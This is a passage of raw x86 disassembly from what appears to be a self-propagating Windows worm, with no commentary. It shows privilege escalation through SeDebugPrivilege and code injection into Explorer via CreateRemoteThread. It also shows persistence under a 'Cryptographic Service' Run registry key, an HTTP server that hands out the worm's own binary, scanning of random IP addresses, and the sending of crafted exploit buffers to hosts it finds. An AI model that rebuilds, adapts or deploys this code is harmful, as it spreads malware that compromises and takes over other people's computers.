and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31422CD6
add esp, 0Ch
push offset byte_314242B8
call dword_31421084
push eax
lea eax, [ebp+var_EA4]
push offset byte_314242B8
push eax
call sub_31422CE2
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_31421084
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31422CE2
mov eax, dword_31424BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_31421A98: ; CODE XREF: sub_31421801+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 68h
push offset dword_314247FC
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0A0h
push offset dword_31424868
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
cmp [ebp+arg_0], 0
jz loc_31421CE7
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31424A20
push eax
call sub_31422CE2
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31422CE2
push 70h
lea eax, [ebp+var_690C]
push offset dword_31424A8C
push eax
call sub_31422CE2
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31422CE2
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31424B00
push eax
call sub_31422CE2
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx
push edi
call esi
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3142116C
cmp eax, 0FFFFFFFFh
jz loc_31421D4C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31421D3F
; ---------------------------------------------------------------------------
loc_31421BF7: ; CODE XREF: sub_31421801+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31422CD6
push 4
lea eax, [ebp+var_24F4]
push offset dword_31424BF8
push eax
call sub_31422CE2
push offset byte_314242B8
call sub_31422CDC
push eax
lea eax, [ebp+var_24E4]
push offset byte_314242B8
push eax
call sub_31422CE2
push 4
lea eax, [ebp+var_21C0]
push offset loc_31424C70
push eax
call sub_31422CE2
push 4
lea eax, [ebp+var_21BC]
push offset dword_31424BF8
push eax
call sub_31422CE2
add esp, 40h
push offset byte_314242B8
call sub_31422CDC
push eax
lea eax, [ebp+var_21B0]
push offset byte_314242B8
push eax
call sub_31422CE2
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_31421C93: ; CODE XREF: sub_31421801+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_31421C93
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31422CD6
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31422CD6
add esp, 18h
jmp loc_31421A98
; ---------------------------------------------------------------------------
loc_31421CE7: ; CODE XREF: sub_31421801+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3142490C
push eax
call sub_31422CE2
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31422CE2
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3142498C
push eax
call sub_31422CE2
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_31421D3F: ; CODE XREF: sub_31421801+3F1�j
push eax
push [ebp+var_4]
call ebx
push edi
call esi
and [ebp+var_C], 0
loc_31421D4C: ; CODE XREF: sub_31421801+1AD�j
; sub_31421801+1E1�j ...
push 2
push [ebp+var_4]
call dword_31421170
loc_31421D57: ; CODE XREF: sub_31421801+166�j
push [ebp+var_4]
call dword_31421174
pop esi
loc_31421D61: ; CODE XREF: sub_31421801+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31421801 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421D68 proc near ; CODE XREF: UPX0:loc_31422376�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_314210A8
mov esi, dword_314210A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi
test eax, eax
mov [ebp+var_4], eax
jz short loc_31421DEC
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi
test eax, eax
mov [ebp+var_8], eax
jz short loc_31421DEC
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi
mov esi, eax
test esi, esi
jz short loc_31421DEC
lea eax, [ebp+var_C]
push eax
push 20h
call dword_314210A0
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi
loc_31421DEC: ; CODE XREF: sub_31421D68+28�j
; sub_31421D68+37�j ...
pop edi
pop esi
leave
retn
sub_31421D68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421DF0 proc near ; CODE XREF: UPX0:3142238A�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31425000
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_314210B4
mov esi, dword_314210A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31421E37
loc_31421E33: ; CODE XREF: sub_31421DF0+54�j
push 1
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E37: ; CODE XREF: sub_31421DF0+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi
test eax, eax
mov [ebp+var_14], eax
jz short loc_31421E33
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31421110
test eax, eax
jnz short loc_31421E65
call dword_31421114
test eax, eax
jnz short loc_31421E65
push 2
jmp short loc_31421E88
; ---------------------------------------------------------------------------
loc_31421E65: ; CODE XREF: sub_31421DF0+65�j
; sub_31421DF0+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31421118
push [ebp+var_8]
push 0
push 42Ah
call dword_314210B0
mov ebx, eax
test ebx, ebx
jnz short loc_31421E8B
push 3
loc_31421E88: ; CODE XREF: sub_31421DF0+45�j
; sub_31421DF0+73�j
pop eax
jmp short loc_31421EF6
; ---------------------------------------------------------------------------
loc_31421E8B: ; CODE XREF: sub_31421DF0+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3142107C
test eax, eax
jz short loc_31421EE9
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_314210AC
push dword_31424FF4
call esi
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31421ED5
push eax
call esi
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421ED5: ; CODE XREF: sub_31421DF0+DE�j
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov [ebp+var_4], 5
jmp short loc_31421EF0
; ---------------------------------------------------------------------------
loc_31421EE9: ; CODE XREF: sub_31421DF0+B2�j
mov [ebp+var_4], 4
loc_31421EF0: ; CODE XREF: sub_31421DF0+E3�j
; sub_31421DF0+F7�j
push ebx
call esi
mov eax, [ebp+var_4]
loc_31421EF6: ; CODE XREF: sub_31421DF0+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421EFB proc near ; CODE XREF: sub_314221C4+B�p
; UPX0:3142234C�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_314210B8
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_314210EC
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421EFB endp
; =============== S U B R O U T I N E =======================================
sub_31421F29 proc near ; CODE XREF: sub_31421DF0+EA�p
; UPX0:31422356�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_314210BC
retn
sub_31421F29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F38 proc near ; CODE XREF: sub_314223B2+155�p
; sub_314223B2+160�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0
pop ebp
retn
sub_31421F38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421F52 proc near ; CODE XREF: sub_314221C4+12C�p
; sub_314225C3+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_314210C0
push eax
call dword_3142107C
pop ebp
retn
sub_31421F52 endp
; =============== S U B R O U T I N E =======================================
sub_31421F73 proc near ; CODE XREF: sub_314211A0+68�p
; sub_31422A9B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31421F9B
loc_31421F84: ; CODE XREF: sub_31421F73+26�j
call dword_314210FC
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31421F84
loc_31421F9B: ; CODE XREF: sub_31421F73+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31421F73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FA3 proc near ; CODE XREF: sub_314211A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31422CD6
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_314210C4
push [ebp+var_C]
mov esi, dword_3142107C
mov edi, eax
call esi
push [ebp+var_10]
call esi
mov eax, edi
pop edi
pop esi
leave
retn
sub_31421FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421FF9 proc near ; CODE XREF: sub_3142264B+3E�p
; sub_31422712+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3142114C
cmp eax, 0FFFFFFFFh
jnz short loc_3142201A
call dword_31421150
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_3142201A: ; CODE XREF: sub_31421FF9+15�j
lea eax, [ebp+var_34]
push eax
call dword_31421154
test eax, eax
jnz short loc_3142202F
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_3142202F: ; CODE XREF: sub_31421FF9+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31421FF9 endp
; =============== S U B R O U T I N E =======================================
sub_31422038 proc near ; CODE XREF: sub_314216A2+12�p
; sub_3142255F+22�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31421130
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31422038 endp
; =============== S U B R O U T I N E =======================================
sub_3142204E proc near ; CODE XREF: sub_314223B2+E6�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_314210CC
test eax, eax
jz short locret_31422067
push eax
call dword_314210C8
locret_31422067: ; CODE XREF: sub_3142204E+10�j
retn
sub_3142204E endp
; =============== S U B R O U T I N E =======================================
sub_31422068 proc near ; CODE XREF: sub_314216A2+68�p
push esi
mov esi, dword_314210FC
push edi
call esi
mov edi, eax
shl edi, 10h
call esi
or eax, edi
pop edi
pop esi
retn
sub_31422068 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142207E proc near ; DATA XREF: sub_314221C4+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3142116C
cmp eax, 0FFFFFFFFh
jnz short loc_314220AF
push 1
jmp loc_3142216A
; ---------------------------------------------------------------------------
loc_314220AF: ; CODE XREF: sub_3142207E+28�j
mov esi, dword_31421104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
lea eax, [ebp+var_100]
push offset dword_314241F0
push eax
call esi
pop ecx
test eax, eax
pop ecx
jz loc_3142217A
mov esi, dword_31421168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi
push dword_31424FF0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3142111C
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31422CDC
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi
loc_3142212C: ; CODE XREF: sub_3142207E+E8�j
mov eax, dword_31424FF0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_3142213E
mov eax, ecx
loc_3142213E: ; CODE XREF: sub_3142207E+BC�j
test eax, eax
jz short loc_3142216D
push 0
push eax
mov eax, dword_31424FE8
add eax, edi
push eax
push ebx
call esi
cmp eax, 0FFFFFFFFh
jz short loc_31422168
cmp eax, 1000h
jb short loc_3142216D
push 64h
add edi, eax
call dword_31421094
jmp short loc_3142212C
; ---------------------------------------------------------------------------
loc_31422168: ; CODE XREF: sub_3142207E+D5�j
push 2
loc_3142216A: ; CODE XREF: sub_3142207E+2C�j
pop eax
jmp short loc_314221BD
; ---------------------------------------------------------------------------
loc_3142216D: ; CODE XREF: sub_3142207E+C2�j
; sub_3142207E+DC�j
push offset dword_31424FEC
call dword_314210D4
jmp short loc_31422198
; ---------------------------------------------------------------------------
loc_3142217A: ; CODE XREF: sub_3142207E+49�j
; sub_3142207E+61�j
mov esi, dword_31421168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi
push 0
push 3
push offset dword_31424D38
push ebx
call esi
loc_31422198: ; CODE XREF: sub_3142207E+FA�j
push 7D0h
call dword_31421094
push 2
push ebx
call dword_31421170
push ebx
call dword_31421174
push 0
call dword_314210D0
xor eax, eax
loc_314221BD: ; CODE XREF: sub_3142207E+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3142207E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314221C4 proc near ; DATA XREF: sub_314223B2+150�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31421EFB
lea eax, [ebp+var_130]
push 104h
push eax
push offset aCryptographicS ; "Cryptographic Service"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31424FEC, ebx
call sub_31422882
add esp, 14h
test eax, eax
jnz loc_314222F9
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_31421080
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31422230
push 1
call dword_314210D0
loc_31422230: ; CODE XREF: sub_314221C4+62�j
push ebx
push esi
call dword_314210DC
push eax
mov dword_31424FF0, eax
call sub_31422CA5
pop ecx
mov dword_31424FE8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31424FF0
push eax
push esi
call dword_314210D8
mov eax, [ebp+var_4]
push esi
mov dword_31424FF0, eax
call dword_3142107C
push ebx
push 1
push 2
call dword_31421158
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31422CD6
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31422292: ; CODE XREF: sub_314221C4+E5�j
; sub_314221C4+ED�j ...
call dword_314210FC
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_31424FFC, eax
jz short loc_31422292
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31422292
push eax
call dword_31421160
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31421140
test eax, eax
jnz short loc_31422292
push 64h
push edi
call dword_31421144
mov [ebp+var_8], esi
pop esi
loc_314222DB: ; CODE XREF: sub_314221C4+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31421148
push eax
push offset sub_3142207E
call sub_31421F52
pop ecx
pop ecx
jmp short loc_314222DB
; ---------------------------------------------------------------------------
loc_314222F9: ; CODE XREF: sub_314221C4+3D�j
push ebx
call dword_314210D0
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_314221C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422308 proc near ; CODE XREF: sub_314223B2:loc_314224FC�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3142113C
push eax
push 2
call esi
lea eax, [ebp+var_190]
push eax
push 102h
call esi
pop esi
leave
retn
sub_31422308 endp
; ---------------------------------------------------------------------------
loc_31422334: ; CODE XREF: UPX1:31427D08�j
push 0
call dword_314210B4
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_31425000, eax
call dword_31421074
call sub_31421EFB
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
call dword_314210E4
cmp eax, 0B7h
jnz short loc_31422376
push 1
call dword_314210E0
loc_31422376: ; CODE XREF: UPX0:3142236C�j
call sub_31421D68
call sub_314229E6
call sub_31422B67
push offset sub_314223B2
call sub_31421DF0
test eax, eax
pop ecx
jz short loc_3142239B
push 0
call sub_314223B2
loc_3142239B: ; CODE XREF: UPX0:31422392�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_3142239E proc near ; CODE XREF: sub_314223B2:loc_31422525�p
; sub_3142255F:loc_31422578�p ...
push 0
push dword_31424FF8
call dword_31421070
neg eax
sbb eax, eax
inc eax
retn
sub_3142239E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314223B2 proc near ; CODE XREF: UPX0:31422396�p
; DATA XREF: UPX0:31422385�o
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421190
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 64h
push ebx
push esi
push edi
mov [ebp+var_70], offset aU10x ; "u10x"
mov [ebp+var_6C], offset aU11x ; "u11x"
mov [ebp+var_68], offset aU12x ; "u12x"
mov [ebp+var_64], offset aU13x ; "u13x"
mov [ebp+var_60], offset aU14x ; "u14x"
mov [ebp+var_5C], offset aU15x ; "u15x"
mov [ebp+var_58], offset aU16x ; "u16x"
mov [ebp+var_54], offset aU17x ; "u17x"
mov [ebp+var_50], offset aU18x ; "u18x"
mov [ebp+var_4C], offset aU8 ; "u8"
mov [ebp+var_48], offset aU9 ; "u9"
mov [ebp+var_44], offset aU10 ; "u10"
mov [ebp+var_40], offset aU11 ; "u11"
mov [ebp+var_3C], offset aU12 ; "u12"
mov [ebp+var_38], offset aU13 ; "u13"
mov [ebp+var_34], offset aU13i ; "u13i"
mov [ebp+var_30], offset aU14 ; "u14"
mov [ebp+var_2C], offset aU15 ; "u15"
mov [ebp+var_28], offset aU16 ; "u16"
mov [ebp+var_24], offset aU17 ; "u17"
mov [ebp+var_20], offset aU18 ; "u18"
mov [ebp+var_1C], offset aU19 ; "u19"
push offset aU19x ; "u19x"
xor edi, edi
push edi
push 1
push edi
call dword_3142106C
mov dword_31424FF8, eax
mov [ebp+var_4], edi
mov [ebp+var_74], edi
loc_3142248B: ; CODE XREF: sub_314223B2+EF�j
cmp [ebp+var_74], 9
jnb short loc_314224A3
mov eax, [ebp+var_74]
push [ebp+eax*4+var_70]
call sub_3142204E
pop ecx
inc [ebp+var_74]
jmp short loc_3142248B
; ---------------------------------------------------------------------------
loc_314224A3: ; CODE XREF: sub_314223B2+DD�j
mov [ebp+var_74], edi
loc_314224A6: ; CODE XREF: sub_314223B2+10A�j
cmp [ebp+var_74], 0Dh
jnb short loc_314224BE
mov eax, [ebp+var_74]
push [ebp+eax*4+var_4C]
call sub_31421F29
pop ecx
inc [ebp+var_74]
jmp short loc_314224A6
; ---------------------------------------------------------------------------
loc_314224BE: ; CODE XREF: sub_314223B2+F8�j
cmp [ebp+arg_0], edi
jz short loc_314224FC
push offset aWs2_32 ; "ws2_32"
mov esi, dword_314210A8
call esi
push offset aWininet ; "wininet"
call esi
push offset aMsvcrt ; "msvcrt"
call esi
push offset aAdvapi32 ; "advapi32"
call esi
push offset aUser32 ; "user32"
call esi
push offset aUterm19 ; "uterm19"
call sub_31421F29
pop ecx
mov dword_31424FF4, eax
loc_314224FC: ; CODE XREF: sub_314223B2+10F�j
call sub_31422308
push edi
push offset sub_314221C4
call sub_31421F38
push edi
push offset sub_314216A2
call sub_31421F38
push edi
push offset loc_3142276E
call sub_31421F38
add esp, 18h
loc_31422525: ; CODE XREF: sub_314223B2+18E�j
call sub_3142239E
test eax, eax
jnz short loc_31422542
push edi
call dword_31421018
push 1388h
call dword_31421094
jmp short loc_31422525
; ---------------------------------------------------------------------------
loc_31422542: ; CODE XREF: sub_314223B2+17A�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_314223B2 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142255F proc near ; DATA XREF: sub_314225C3+55�o
; sub_3142264B+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_3142256E
push 1
pop eax
jmp short locret_314225BF
; ---------------------------------------------------------------------------
loc_3142256E: ; CODE XREF: sub_3142255F+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_31422578: ; CODE XREF: sub_3142255F+5A�j
call sub_3142239E
test eax, eax
jnz short loc_314225BB
call sub_31422038
test eax, eax
jz short loc_314225BB
cmp [ebp+var_1], bl
jz short loc_314225B4
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31421801
movzx esi, word_3142500C
pop ecx
call dword_314210FC
cdq
idiv esi
add edx, esi
push edx
call dword_31421094
loc_314225B4: ; CODE XREF: sub_3142255F+2E�j
inc bl
cmp bl, 0FFh
jb short loc_31422578
loc_314225BB: ; CODE XREF: sub_3142255F+20�j
; sub_3142255F+29�j
pop esi
xor eax, eax
pop ebx
locret_314225BF: ; CODE XREF: sub_3142255F+D�j
leave
retn 4
sub_3142255F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314225C3 proc near ; DATA XREF: sub_3142264B+7E�o
; UPX0:31422803�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_314225D1
push 1
pop eax
jmp short loc_31422647
; ---------------------------------------------------------------------------
loc_314225D1: ; CODE XREF: sub_314225C3+7�j
push ebx
push esi
push edi
call sub_31421EFB
mov esi, dword_314210FC
xor ebx, ebx
loc_314225E1: ; CODE XREF: sub_314225C3+7D�j
call sub_3142239E
test eax, eax
jnz short loc_31422642
call sub_31422038
test eax, eax
jz short loc_31422642
call esi
mov byte ptr [ebp+arg_0+2], al
call esi
push offset dword_31425004
mov byte ptr [ebp+arg_0+3], al
call dword_314210D4
push [ebp+arg_0]
call sub_31421801
test eax, eax
pop ecx
jnz short loc_31422624
push [ebp+arg_0]
push offset sub_3142255F
call sub_31421F52
pop ecx
pop ecx
loc_31422624: ; CODE XREF: sub_314225C3+50�j
movzx edi, word_3142500C
call esi
cdq
idiv edi
add edx, edi
push edx
call dword_31421094
inc ebx
cmp ebx, 8000h
jl short loc_314225E1
loc_31422642: ; CODE XREF: sub_314225C3+25�j
; sub_314225C3+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31422647: ; CODE XREF: sub_314225C3+C�j
pop ebp
retn 4
sub_314225C3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142264B proc near ; DATA XREF: UPX0:3142281B�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31421EFB
call sub_3142239E
test eax, eax
jnz loc_31422704
push ebx
mov ebx, dword_31421094
push esi
mov esi, dword_314210FC
push edi
loc_31422671: ; CODE XREF: sub_3142264B+48�j
; sub_3142264B+B0�j
call esi
mov byte ptr [ebp+var_4+1], al
call esi
mov byte ptr [ebp+var_4+3], al
call esi
mov byte ptr [ebp+var_4+2], al
loc_31422680: ; CODE XREF: sub_3142264B+3C�j
call esi
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31422680
call sub_31421FF9
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31422671
call sub_31422038
test eax, eax
jz short loc_314226DC
push offset dword_31425004
call dword_314210D4
push edi
call sub_31421801
test eax, eax
pop ecx
jnz short loc_314226E3
push edi
push offset sub_3142255F
call sub_31421F52
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_314226C8: ; CODE XREF: sub_3142264B+8D�j
push edi
push offset sub_314225C3
call sub_31421F52
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_314226C8
jmp short loc_314226E3
; ---------------------------------------------------------------------------
loc_314226DC: ; CODE XREF: sub_3142264B+51�j
push 2710h
call ebx
loc_314226E3: ; CODE XREF: sub_3142264B+67�j
; sub_3142264B+8F�j
movzx edi, word_3142500C
call esi
cdq
idiv edi
add edx, edi
push edx
call ebx
call sub_3142239E
test eax, eax
jz loc_31422671
pop edi
pop esi
pop ebx
loc_31422704: ; CODE XREF: sub_3142264B+11�j
push 0
call dword_314210D0
xor eax, eax
leave
retn 4
sub_3142264B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31422712 proc near ; CODE XREF: UPX0:314227E0�p
; UPX0:loc_31422846�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31421FF9
